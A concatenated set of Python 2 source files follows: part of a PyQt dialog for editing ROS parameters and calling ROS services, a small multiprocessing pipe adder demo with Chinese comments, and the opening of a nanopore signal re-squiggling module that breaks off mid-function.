self.setUpdatesEnabled(True)
def _createFieldFromDict(self, value, layout=None):
if layout is None:
layout = self.param_widget.layout()
# sort the items: 1. header, 2. all premitives (sorted), 3. list, dict (sorted)
all_params = []
primitives = []
komplex = []
for name, (_type, val) in value.items():
if _type in ['std_msgs/Header']:
all_params.append((name, _type, val))
elif isinstance(val, (dict, list)):
komplex.append((name, _type, val))
else:
primitives.append((name, _type, val))
all_params.extend(sorted(primitives))
all_params.extend(sorted(komplex))
# create widgets
for name, _type, val in all_params:
field = self.getField(name)
if field is None:
param_desc = ParameterDescription(name, _type, val)
field = param_desc.createTypedWidget(self)
param_desc.setWidget(field)
self.params.append(param_desc)
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val)
layout.addRow(field)
else:
label_name = name if _type == 'string' else ''.join([name, ' (', _type, ')'])
label = QLabel(label_name, self)
label.setObjectName(''.join([name, '_label']))
label.setBuddy(field)
layout.addRow(label, field)
else:
if isinstance(field, (GroupBox, ArrayBox)):
field.createFieldFromValue(val)
else:
raise Exception(''.join(["Parameter with name '", name, "' already exists!"]))
def value(self):
result = dict()
for param in self.params:
if not param.isBinaryType():
result[param.name()] = param.value()
return result
def set_values(self, values):
'''
Sets the values for existing fields.
:param values: the dictionary with values to set.
:type values: dict
:raise Exception: on errors
'''
if isinstance(values, dict):
for param, val in values.items():
value = val
_type = 'unknown'
if isinstance(val, tuple):
(_type, value) = val
field = self.getField(param)
if field is not None:
if isinstance(field, (GroupBox, ArrayBox)):
field.set_values(value)
else:
if isinstance(field, QCheckBox):
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
field.setChecked(value)
elif isinstance(field, QLineEdit):
# avoid ' or " that escapes the string values
field.setText(', '.join([unicode(v) for v in value]) if isinstance(value, list) else unicode(value))
elif isinstance(field, QComboBox):
field.setEditText(', '.join([unicode(v) for v in value]) if isinstance(value, list) else unicode(value))
elif isinstance(values, list):
raise Exception("Setting 'list' values in MainBox or GroupBox not supported!!!")
def getField(self, name, recursive=False):
for child in self.children():
for c in child.children():
if recursive and isinstance(c, MainBox):
result = c.getField(name, recursive=recursive)
if result is not None:
return result
elif c.objectName() == name:
return c
return None
def removeAllFields(self):
'''
Remove the references between parameter and corresponding widgets
(ComboBox, CheckBox, ..) and remove these widgets from layouts.
'''
for child in self.param_widget.children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
def filter(self, arg):
'''
Hide the parameter input field, which label dosn't contains the C{arg}.
@param arg: the filter text
@type arg: C{str}
'''
result = False
for child in self.param_widget.children():
if isinstance(child, (MainBox, GroupBox, ArrayBox)):
show = not arg or child.objectName().lower().find(arg.lower()) != -1
show = child.filter(arg) or show
# hide group, if no parameter are visible
child.setVisible(show)
if show:
child.setCollapsed(False)
result = True
elif isinstance(child, (QWidget)) and not isinstance(child, (QLabel)) and not isinstance(child, (QFrame)):
label = child.parentWidget().layout().labelForField(child)
if label is not None:
has_text = child.objectName().lower().find(arg.lower()) == -1
show = not arg or (not has_text or (hasattr(child, 'currentText') and not has_text))
# set the parent group visible if it is not visible
if show and not child.parentWidget().isVisible():
child.parentWidget().setVisible(show)
label.setVisible(show)
child.setVisible(show)
if show:
result = True
return result
def setVisible(self, arg):
if arg and not self.parentWidget() is None and not self.parentWidget().isVisible():
self.parentWidget().setVisible(arg)
QWidget.setVisible(self, arg)
class GroupBox(MainBox):
'''
Groups the parameter of a dictionary, struct or class using the group box for
visualization.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self.setObjectName(name)
class ArrayEntry(MainBox):
'''
A part of the ArrayBox to represent the elements of a list.
'''
def __init__(self, index, param_type, parent=None):
MainBox.__init__(self, ''.join(['#', str(index)]), param_type, True, parent)
self.index = index
self.setObjectName(''.join(['[', str(index), ']']))
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Plain)
self.type_label.setVisible(False)
# boxLayout = QFormLayout()
# boxLayout.setVerticalSpacing(0)
# label = QLabel(''.join(['[', str(index), ']']))
# self.param_widget.layout().addRow(label)
# self.setLayout(boxLayout)
def value(self):
result = dict()
for param in self.params:
result[param.name()] = param.value()
return result
class ArrayBox(MainBox):
'''
Groups the parameter of a list.
'''
def __init__(self, name, param_type, parent=None):
MainBox.__init__(self, name, param_type, True, parent)
self._dynamic_value = None
self._dynamic_widget = None
self._dynamic_items_count = 0
def addDynamicBox(self):
self._dynamic_items_count = 0
addButton = QPushButton("+")
addButton.setMaximumSize(25, 25)
addButton.clicked.connect(self._on_add_dynamic_entry)
self.options_layout.addWidget(addButton)
self.count_label = QLabel('0')
self.options_layout.addWidget(self.count_label)
remButton = QPushButton("-")
remButton.setMaximumSize(25, 25)
remButton.clicked.connect(self._on_rem_dynamic_entry)
self.options_layout.addWidget(remButton)
def _on_add_dynamic_entry(self):
self.setUpdatesEnabled(False)
try:
if self._dynamic_value is not None:
for v in self._dynamic_value:
if isinstance(v, dict):
entry_frame = ArrayEntry(self._dynamic_items_count, self.type)
self.param_widget.layout().addRow(entry_frame)
entry_frame._createFieldFromDict(v)
self._dynamic_items_count += 1
self.count_label.setText(str(self._dynamic_items_count))
break
finally:
self.setUpdatesEnabled(True)
def _on_rem_dynamic_entry(self):
if self._dynamic_items_count > 0:
self._dynamic_items_count -= 1
item = self.param_widget.layout().takeAt(self._dynamic_items_count)
self.param_widget.layout().removeItem(item)
try:
# remove the referenced parameter, too
for child in item.widget().children():
if isinstance(child, MyComboBox):
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
elif isinstance(child, MainBox):
child.removeAllFields()
self.param_widget.layout().removeWidget(child)
child.parameter_description.setWidget(None)
self.params.remove(child.parameter_description)
item.widget().setParent(None)
del item
except:
import traceback
print traceback.format_exc(1)
self.count_label.setText(str(self._dynamic_items_count))
def createFieldFromValue(self, value):
self.setUpdatesEnabled(False)
try:
if isinstance(value, list):
self.addDynamicBox()
self._dynamic_value = value
self.set_values(value)
finally:
self.setUpdatesEnabled(True)
def value(self):
'''
Goes through the list and creates dictionary with values of each element.
'''
result = list()
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
result.append(item.widget().value())
return result
def set_values(self, values):
'''
Create a list of the elements and sets their values.
:param values: The list of dictionaries with parameter values
:type values: list
'''
if isinstance(values, list):
count_entries = 0
# determine the count of existing elements
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
count_entries += 1
# create the list of the elements of the length of values
if count_entries < len(values):
for i in range(len(values) - count_entries):
self._on_add_dynamic_entry()
elif count_entries > len(values):
for i in range(count_entries - len(values)):
self._on_rem_dynamic_entry()
# set the values
for i in range(self.param_widget.layout().rowCount()):
item = self.param_widget.layout().itemAt(i, QFormLayout.SpanningRole)
if item and isinstance(item.widget(), ArrayEntry):
item.widget().set_values(values[i])
class ScrollArea(QScrollArea):
'''
ScrollArea provides the maximal width of the internal widget.
'''
def viewportEvent(self, arg):
if self.widget() and self.viewport().size().width() != self.widget().maximumWidth():
self.widget().setMaximumWidth(self.viewport().size().width())
return QScrollArea.viewportEvent(self, arg)
class ParameterDialog(QDialog):
'''
This dialog creates an input mask for the given parameter and their types.
'''
def __init__(self, params=dict(), buttons=QDialogButtonBox.Cancel | QDialogButtonBox.Ok, sidebar_var='', parent=None):
'''
Creates an input dialog.
@param params: a dictionary with parameter names and (type, values).
The C{value}, can be a primitive value, a list with values or parameter
dictionary to create groups. In this case the type is the name of the group.
@type params: C{dict(str:(str, {value, [..], dict()}))}
'''
QDialog.__init__(self, parent=parent)
self.setObjectName('ParameterDialog - %s' % str(params))
self.__current_path = nm.settings().current_dialog_path
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setObjectName("horizontalLayout")
self.horizontalLayout.setContentsMargins(1, 1, 1, 1)
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout.setContentsMargins(1, 1, 1, 1)
# add filter row
self.filter_frame = QFrame(self)
filterLayout = QHBoxLayout(self.filter_frame)
filterLayout.setContentsMargins(1, 1, 1, 1)
label = QLabel("Filter:", self.filter_frame)
self.filter_field = EnchancedLineEdit(self.filter_frame)
filterLayout.addWidget(label)
filterLayout.addWidget(self.filter_field)
self.filter_field.textChanged.connect(self._on_filter_changed)
self.filter_visible = True
self.verticalLayout.addWidget(self.filter_frame)
# create area for the parameter
self.scrollArea = scrollArea = ScrollArea(self)
scrollArea.setObjectName("scrollArea")
scrollArea.setWidgetResizable(True)
self.content = MainBox('/', 'str', False, self)
scrollArea.setWidget(self.content)
self.verticalLayout.addWidget(scrollArea)
# add info text field
self.info_field = QTextEdit(self)
self.info_field.setVisible(False)
palette = QPalette()
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.Base, brush)
brush = QBrush(QColor(255, 254, 242))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Inactive, QPalette.Base, brush)
brush = QBrush(QColor(244, 244, 244))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Disabled, QPalette.Base, brush)
self.info_field.setPalette(palette)
self.info_field.setFrameShadow(QFrame.Plain)
self.info_field.setReadOnly(True)
self.info_field.setTextInteractionFlags(Qt.LinksAccessibleByKeyboard | Qt.LinksAccessibleByMouse | Qt.TextBrowserInteraction | Qt.TextSelectableByKeyboard | Qt.TextSelectableByMouse)
self.info_field.setObjectName("dialog_info_field")
self.verticalLayout.addWidget(self.info_field)
# create buttons
self.buttonBox = QDialogButtonBox(self)
self.buttonBox.setObjectName("buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.verticalLayout.addWidget(self.buttonBox)
self.horizontalLayout.addLayout(self.verticalLayout)
# add side bar for checklist
values = nm.history().cachedParamValues('/%s' % sidebar_var)
self.sidebar_frame = QFrame()
self.sidebar_frame.setObjectName(sidebar_var)
sidebarframe_verticalLayout = QVBoxLayout(self.sidebar_frame)
sidebarframe_verticalLayout.setObjectName("sidebarframe_verticalLayout")
sidebarframe_verticalLayout.setContentsMargins(1, 1, 1, 1)
self._sidebar_selected = 0
if len(values) > 1 and sidebar_var in params:
self.horizontalLayout.addWidget(self.sidebar_frame)
try:
self.sidebar_default_val = params[sidebar_var][1]
except:
self.sidebar_default_val = ''
values.sort()
for v in values:
checkbox = QCheckBox(v)
checkbox.setObjectName(v)
checkbox.stateChanged.connect(self._on_sidebar_stateChanged)
self.sidebar_frame.layout().addWidget(checkbox)
self.sidebar_frame.layout().addItem(QSpacerItem(100, 20, QSizePolicy.Minimum, QSizePolicy.Expanding))
# set the input fields
if params:
self.content.createFieldFromValue(params)
self.setInfoActive(False)
if self.filter_frame.isVisible():
self.filter_field.setFocus()
self.setMinimumSize(350, 200)
def __del__(self):
self.content.removeAllFields()
def _on_sidebar_stateChanged(self, state):
if state == Qt.Checked:
self._sidebar_selected += 1
elif state == Qt.Unchecked:
self._sidebar_selected -= 1
if self._sidebar_selected in [0, 1]:
try:
field = self.content.getField(self.sidebar_frame.objectName())
if field is not None and field.currentText() == self.sidebar_default_val:
field.setEnabled(True if self._sidebar_selected == 0 else False)
except:
pass
def showLoadSaveButtons(self):
self.load_button = QPushButton()
self.load_button.setIcon(QIcon(':/icons/load.png'))
self.load_button.clicked.connect(self._load_parameter)
self.load_button.setToolTip('Load parameters from YAML file')
self.load_button.setFlat(True)
self.buttonBox.addButton(self.load_button, QDialogButtonBox.ActionRole)
self.save_button = QPushButton()
self.save_button.clicked.connect(self._save_parameter)
self.save_button.setIcon(QIcon(':/icons/save.png'))
self.save_button.setToolTip('Save parameters to YAML file')
self.save_button.setFlat(True)
self.buttonBox.addButton(self.save_button, QDialogButtonBox.ActionRole)
def _on_filter_changed(self):
self.content.filter(self.filter_field.text())
def setFilterVisible(self, val):
'''
Shows or hides the filter row.
'''
self.filter_visible = val
self.filter_frame.setVisible(val & self.scrollArea.isHidden())
def add_warning(self, message):
label = QLabel()
label.setWordWrap(True)
label.setText(''.join(["<font color='red'>Warning!\n", message, "</font>"]))
self.verticalLayout.insertWidget(1, label)
def setText(self, text):
'''
Adds a label to the dialog's layout and shows the given text.
@param text: the text to add to the dialog
@type text: C{str}
'''
self.info_field.setText(text)
self.setInfoActive(True)
def setInfoActive(self, val):
'''
Activates or deactivates the info field of this dialog. If info field is
activated, the filter frame and the input field are deactivated.
@type val: C{bool}
'''
if val and self.info_field.isHidden():
self.filter_frame.setVisible(False & self.filter_visible)
self.scrollArea.setVisible(False)
self.info_field.setVisible(True)
elif not val and self.scrollArea.isHidden():
self.filter_frame.setVisible(True & self.filter_visible)
self.scrollArea.setVisible(True)
self.info_field.setVisible(False)
if self.filter_frame.isVisible():
self.filter_field.setFocus()
def setFocusField(self, field_label):
field = self.content.getField(field_label, recursive=True)
if field is not None:
field.setFocus()
def getKeywords(self, only_changed=False):
'''
@param only_changed: requests only changed parameter
@type only_changed: bool (Default: False)
@returns: a directory with parameter and value for all entered fields.
@rtype: C{dict(str(param) : str(value))}
'''
# get the results of sidebar
sidebar_list = []
sidebar_name = self.sidebar_frame.objectName()
for j in range(self.sidebar_frame.layout().count() - 1):
w = self.sidebar_frame.layout().itemAt(j).widget()
if isinstance(w, QCheckBox):
if w.checkState() == Qt.Checked:
sidebar_list.append((w.objectName(), True))
result_value = self.content.value()
# add the sidebar results
if sidebar_name in result_value:
# skip the default value, if elements are selected in the side_bar
if len(sidebar_list) == 0 or self.sidebar_default_val != result_value[sidebar_name][0]:
sidebar_list.append(result_value[sidebar_name])
result_value[sidebar_name] = ([v for v, _ in set(sidebar_list)], True) # _:=changed
result = self._remove_change_state(result_value, only_changed)
return result
def keywords2params(self, keywords):
'''
Resolves the dictionary values to ROS parameter names.
@param keywords: the result of the getKeywords
@return: dictionary of (ROS parameter name : value)
'''
result = dict()
for param, value in keywords.items():
if isinstance(value, dict):
r = self.keywords2params(value)
for p, v in r.items():
result[roslib.names.ns_join(param, p)] = v
else:
result[param] = value
return result
def _remove_change_state(self, params, only_changed):
result = dict()
for param, value in params.items():
if isinstance(value, dict):
r = self._remove_change_state(value, only_changed)
if r:
result[param] = r
elif isinstance(value, list):
new_val = []
for val in value:
r = self._remove_change_state(val, only_changed)
if r:
new_val.append(r)
if new_val:
result[param] = new_val
elif isinstance(value, tuple):
if value[1] or not only_changed:
result[param] = value[0]
else:
print "unknown parameter: should not happens", param, value
return result
def _save_parameter(self):
try:
import yaml
(fileName, _) = QFileDialog.getSaveFileName(self,
"Save parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
content = self._remove_change_state(self.content.value(), False)
text = yaml.dump(content, default_flow_style=False)
with open(fileName, 'w+') as f:
f.write(text)
except Exception as e:
import traceback
print traceback.format_exc(1)
WarningMessageBox(QMessageBox.Warning, "Save parameter Error",
'Error while save parameter', str(e)).exec_()
def _load_parameter(self):
try:
import yaml
(fileName, _) = QFileDialog.getOpenFileName(self, "Load parameter",
self.__current_path,
"YAML files (*.yaml);;All files (*)")
if fileName:
self.__current_path = os.path.dirname(fileName)
nm.settings().current_dialog_path = os.path.dirname(fileName)
with open(fileName, 'r') as f:
# print yaml.load(f.read())
self.content.set_values(yaml.load(f.read()))
except Exception as e:
import traceback
print traceback.format_exc(1)
WarningMessageBox(QMessageBox.Warning, "Load parameter Error",
'Error while load parameter',
str(e)).exec_()
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% close handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def accept(self):
self.setResult(QDialog.Accepted)
self.accepted.emit()
if self.isModal():
self.hide()
def reject(self):
self.setResult(QDialog.Rejected)
self.rejected.emit()
self.hide()
def hideEvent(self, event):
self.close()
def closeEvent(self, event):
'''
Test the open files for changes and save this if needed.
'''
self.setAttribute(Qt.WA_DeleteOnClose, True)
QDialog.closeEvent(self, event)
class MasterParameterDialog(ParameterDialog):
'''
This dialog is an extension to the L{ParameterDialog}. The parameter and their
values are requested from the ROS master parameter server. The requests are
threaded and allows the also threaded changed of ROS parameter assigned to
given namespace.
'''
def __init__(self, masteruri, ns='/', parent=None):
'''
@param masteruri: if the master uri is not None, the parameter are retrieved from ROS parameter server.
@type masteruri: C{str}
@param ns: namespace of the parameter retrieved from the ROS parameter server.
@type ns: C{str}
'''
ParameterDialog.__init__(self, dict(), parent=parent)
self.masteruri = masteruri
self.ns = ns
self.is_delivered = False
self.is_send = False
self.mIcon = QIcon(":/icons/default_cfg.png")
self.setWindowIcon(self.mIcon)
self.resize(450, 300)
self.add_new_button = QPushButton()
self.add_new_button.setIcon(QIcon(':/icons/crystal_clear_add.png'))
self.add_new_button.clicked.connect(self._on_add_parameter)
self.add_new_button.setToolTip('Adds a new parameter to the list')
self.add_new_button.setFlat(True)
self.buttonBox.addButton(self.add_new_button, QDialogButtonBox.ActionRole)
self.showLoadSaveButtons()
# self.apply_button = QPushButton(self.tr("&Ok"))
# self.apply_button.clicked.connect(self._on_apply)
# self.buttonBox.addButton(self.apply_button, QDialogButtonBox.ApplyRole)
# self.buttonBox.accepted.connect(self._on_apply)
self.setText(' '.join(['Obtaining parameters from the parameter server', masteruri, '...']))
self.parameterHandler = ParameterHandler()
self.parameterHandler.parameter_list_signal.connect(self._on_param_list)
self.parameterHandler.parameter_values_signal.connect(self._on_param_values)
self.parameterHandler.delivery_result_signal.connect(self._on_delivered_values)
self.parameterHandler.requestParameterList(masteruri, ns)
# self.apply_button.setFocus(Qt.OtherFocusReason)
def accept(self):
if self.masteruri is not None and not self.is_send:
try:
params = self.getKeywords(True)
params = self.keywords2params(params)
ros_params = dict()
for p, v in params.items():
rospy.logdebug("updated parameter: %s, %s, %s", p, unicode(v), type(v))
ros_params[roslib.names.ns_join(self.ns, p)] = v
if ros_params:
self.is_send = True
self.setText('Sends parameters to the server...')
self.parameterHandler.deliverParameter(self.masteruri, ros_params)
else:
self.close()
except Exception, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), str(e), QMessageBox.Ok)
elif self.masteruri is None:
QMessageBox.warning(self, self.tr("Error"), 'Invalid ROS master URI', QMessageBox.Ok)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%% ROS parameter handling %%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def _on_add_parameter(self):
params_arg = {'namespace': ('string', self.ns), 'name': ('string', ''), 'type': ('string', ['string', 'int', 'float', 'bool', 'list']), 'value': ('string', '')}
dia = ParameterDialog(params_arg)
dia.setWindowTitle('Add new parameter')
dia.resize(360, 150)
dia.setFilterVisible(False)
if dia.exec_():
try:
params = dia.getKeywords()
if params['name']:
if params['type'] == 'int':
value = int(params['value'])
elif params['type'] == 'float':
value = float(params['value'])
elif params['type'] == 'bool':
value = str2bool(params['value'])
elif params['type'] == 'list':
try:
import yaml
value = yaml.load("[%s]" % params['value'])
# if there is no YAML, load() will return an
# empty string. We want an empty dictionary instead
# for our representation of empty.
if value is None:
value = []
except yaml.MarkedYAMLError, e:
QMessageBox.warning(self, self.tr("Warning"), "yaml error: %s" % str(e), QMessageBox.Ok)
else:
value = params['value']
self._on_param_values(self.masteruri, 1, '', {roslib.names.ns_join(params['namespace'], params['name']): (1, '', value)})
else:
QMessageBox.warning(self, self.tr("Warning"), 'Empty name is not valid!', QMessageBox.Ok)
except ValueError, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), unicode(e), QMessageBox.Ok)
def _on_param_list(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
@param params: The list the parameter names.
@type params: C{[str]}
'''
if code == 1:
params.sort()
self.parameterHandler.requestParameterValues(masteruri, params)
else:
self.setText(msg)
def _on_param_values(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
@param params: The dictionary the parameter names and request result.
@type params: C{dict(paramName : (code, statusMessage, parameterValue))}
'''
if code == 1:
dia_params = dict()
for p, (code_n, _, val) in params.items(): # _:=msg_n
if code_n != 1:
val = ''
type_str = 'string'
value = unicode(val)
if isinstance(val, bool):
type_str = 'bool'
elif isinstance(val, int):
type_str = 'int'
elif isinstance(val, float):
type_str = 'float'
elif isinstance(val, list) or isinstance(val, dict):
# handle representation of `rosparam`
type_str = '[]'
value = ''
for v in val:
if len(value) > 0:
value = value + ', '
value = value + unicode(v)
elif isinstance(val, Binary):
type_str = 'binary'
param = p.replace(self.ns, '')
names_sep = param.split(roslib.names.SEP)
param_name = names_sep.pop()
if names_sep:
group = dia_params
for n in names_sep:
group_name = n
if group_name in group:
group = group[group_name][1]
else:
tmp_dict = dict()
group[group_name] = ('list', tmp_dict)
group = tmp_dict
group[param_name] = (type_str, [value])
else:
dia_params[param_name] = (type_str, [value])
try:
self.content.createFieldFromValue(dia_params)
self.setInfoActive(False)
except Exception, e:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), unicode(e), QMessageBox.Ok)
else:
self.setText(msg)
def _on_delivered_values(self, masteruri, code, msg, params):
'''
@param masteruri: The URI of the ROS parameter server
@type masteruri: C{str}
@param code: The return code of the request. If not 1, the message is set and the list can be ignored.
@type code: C{int}
@param msg: The message of the result.
@type msg: C{str}
@param params: The dictionary the parameter names and request result.
@type params: C{dict(paramName : (code, statusMessage, parameterValue))}
'''
self.is_delivered = True
errmsg = ''
if code == 1:
for _, (code_n, msg, _) in params.items(): # _:=param, val
if code_n != 1:
errmsg = '\n'.join([errmsg, msg])
else:
errmsg = msg if msg else 'Unknown error on set parameter'
if errmsg:
import traceback
print traceback.format_exc(1)
QMessageBox.warning(self, self.tr("Warning"), errmsg, QMessageBox.Ok)
self.is_delivered = False
self.is_send = False
self.setInfoActive(False)
if self.is_delivered:
self.close()
class ServiceDialog(ParameterDialog):
'''
Adds a support for calling a service to the L{ParameterDialog}. The needed
input fields are created from the service request message type. The service
call is executed in a thread to avoid blocking GUI.
'''
service_resp_signal = Signal(str, str)
def __init__(self, service, parent=None):
'''
@param service: Service to call.
@type service: U{master_discovery_fkie.ServiceInfo<http://docs.ros.org/kinetic/api/master_discovery_fkie/html/modules.html#master_discovery_fkie.master_info.ServiceInfo>}
'''
self.service = service
slots = service.get_service_class(True)._request_class.__slots__
types = service.get_service_class()._request_class._slot_types
ParameterDialog.__init__(self, self._params_from_slots(slots, types), buttons=QDialogButtonBox.Close, parent=parent)
self.setWindowTitle(''.join(['Call ', service.name]))
self.service_resp_signal.connect(self._handle_resp)
self.resize(450, 300)
if not slots:
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService)
thread.setDaemon(True)
thread.start()
else:
self.call_service_button = QPushButton(self.tr("&Call"))
self.call_service_button.clicked.connect(self._on_call_service)
self.buttonBox.addButton(self.call_service_button, QDialogButtonBox.ActionRole)
self.hide_button = QPushButton(self.tr("&Hide/Show output"))
self.hide_button.clicked.connect(self._on_hide_output)
self.buttonBox.addButton(self.hide_button, QDialogButtonBox.ActionRole)
self.hide_button.setVisible(False)
self.showLoadSaveButtons()
def _on_hide_output(self):
self.setInfoActive(not self.info_field.isVisible())
def _on_call_service(self):
try:
self.hide_button.setVisible(True)
params = self.getKeywords()
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService, args=((params,)))
thread.setDaemon(True)
thread.start()
except Exception, e:
rospy.logwarn("Error while reading parameter for %s service: %s", str(self.service.name), unicode(e))
self.setText(''.join(['Error while reading parameter:\n', unicode(e)]))
def _callService(self, params={}):
req = unicode(params) if params else ''
try:
req, resp = nm.starter().callService(self.service.uri, self.service.name, self.service.get_service_class(), [params])
self.service_resp_signal.emit(str(req), str(resp))
except Exception, e:
import traceback
print traceback.format_exc(1)
rospy.logwarn("Error while call service '%s': %s", str(self.service.name), str(e))
self.service_resp_signal.emit(unicode(req), unicode(e))
@classmethod
def _params_from_slots(cls, slots, types, values={}):
result = dict()
for slot, msg_type in zip(slots, types):
base_type, is_array, _ = roslib.msgs.parse_type(msg_type) # _:=array_length
if base_type in roslib.msgs.PRIMITIVE_TYPES or base_type in ['time', 'duration']:
default_value = 'now' if base_type in ['time', 'duration'] else ''
if slot in values and values[slot]:
default_value = values[slot]
result[slot] = (msg_type, default_value)
else:
try:
list_msg_class = roslib.message.get_message_class(base_type)
if is_array and slot in values:
subresult = []
for slot_value in values[slot]:
subvalue = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, slot_value if slot in values and slot_value else {})
subresult.append(subvalue)
result[slot] = (msg_type, subresult)
else:
subresult = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, values[slot] if slot in values and values[slot] else {})
result[slot] = (msg_type, [subresult] if is_array else subresult)
except ValueError, e:
import traceback
print traceback.format_exc(1)
rospy.logwarn("Error while parse message type '%s': %s", str(msg_type), str(e))
return result
def _handle_resp(self, req, resp):
self.setWindowTitle(''.join(['Request / Response of ', self.service.name]))
self.setText('\n'.join([unicode(req), '---', unicode(resp)]))
|
pipe_adder_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding:UTF-8
# 管道双向通信
import multiprocessing
#服务器端
def adder(pipe):
server_p, client_p = pipe
client_p.close()
while True:
try:
x, y = server_p.recv()
except EOFError:
break
result = x + y
server_p.send(result) #也可以发送数据? 是的
print('Server done')
if __name__ == '__main__':
#创建管道
server_p,client_p = multiprocessing.Pipe()
#服务器
serv_p = multiprocessing.Process(target=adder, args=((server_p, client_p),))
serv_p.start()
server_p.close()
client_p.send([3,4])
print(client_p.recv()) #也可接收? 是的
client_p.send(['hello', 'world'])
print(client_p.recv())
#关闭客户端
client_p.close()
#等待服务器进程结束
serv_p.join()
|
resquiggle.py
|
import os, sys
import re
import h5py
import Queue
import numpy as np
np.seterr(all='raise')
import multiprocessing as mp
from glob import glob
from time import sleep, time
from subprocess import call, STDOUT
from tempfile import NamedTemporaryFile
from distutils.version import LooseVersion
from itertools import groupby, izip, repeat
from collections import defaultdict, namedtuple
# import nanoraw functions
import option_parsers
import nanoraw_helper as nh
VERBOSE = False
# allow this many times the alignment batch size into the queue of
# reads to be resquiggled
ALIGN_BATCH_MULTIPLIER = 5
indelStats = namedtuple('indelStats',
('start', 'end', 'diff'))
indelGroupStats = namedtuple('indelGroupStats',
('start', 'end', 'cpts', 'indels'))
readInfo = namedtuple(
'readInfo',
('ID', 'Subgroup', 'ClipStart', 'ClipEnd',
'Insertions', 'Deletions', 'Matches', 'Mismatches'))
genomeLoc = namedtuple(
'genomeLoc', ('Start', 'Strand', 'Chrom'))
M5_FIELDS = (
'qName', 'qLength', 'qStart', 'qEnd', 'qStrand',
'tName', 'tLength', 'tStart', 'tEnd', 'tStrand',
'score', 'numMatch', 'numMismatch', 'numIns', 'numDel',
'mapQV', 'qAlignedSeq', 'matchPattern', 'tAlignedSeq')
SAM_FIELDS = (
'qName', 'flag', 'rName', 'pos', 'mapq',
'cigar', 'rNext', 'pNext', 'tLen', 'seq', 'qual')
CIGAR_PAT = re.compile('(\d+)([MIDNSHP=X])')
GAP_PAT = re.compile('-+')
#################################################
########## Raw Signal Re-squiggle Code ##########
#################################################
def write_new_fast5_group(
filename, genome_location, read_info,
read_start_rel_to_raw, new_segs, align_seq, alignVals,
old_segs, norm_signal, scale_values, corrected_group,
basecall_subgroup, norm_type, outlier_thresh, compute_sd):
try:
# compute event data before accessing fast5 file
norm_mean_sd = [
(base_sig.mean(), base_sig.std() if compute_sd else np.nan)
for base_sig in np.split(norm_signal, new_segs[1:-1])]
event_data = np.array(
zip(zip(*norm_mean_sd)[0], zip(*norm_mean_sd)[1],
new_segs[:-1], np.diff(new_segs), list(align_seq)),
dtype=[('norm_mean', '<f8'), ('norm_stdev', '<f8'),
('start', '<u4'), ('length', '<u4'), ('base', 'S1')])
np_read_align = np.chararray(len(alignVals))
np_read_align[:] = zip(*alignVals)[0]
np_genome_align = np.chararray(len(alignVals))
np_genome_align[:] = zip(*alignVals)[1]
except:
raise NotImplementedError, 'Error computing new events.'
try:
read_data = h5py.File(filename, 'r+')
except:
raise NotImplementedError, (
'Error opening file for new group writing. This should ' +
'have been caught during the alignment phase. Check that ' +
'there are no other nanoraw processes or processes ' +
'accessing these HDF5 files running simultaneously.')
try:
corr_grp = read_data['/Analyses/' + corrected_group]
# add subgroup matching subgroup from original basecalls
corr_subgrp = corr_grp.create_group(basecall_subgroup)
corr_subgrp.attrs['shift'] = scale_values.shift
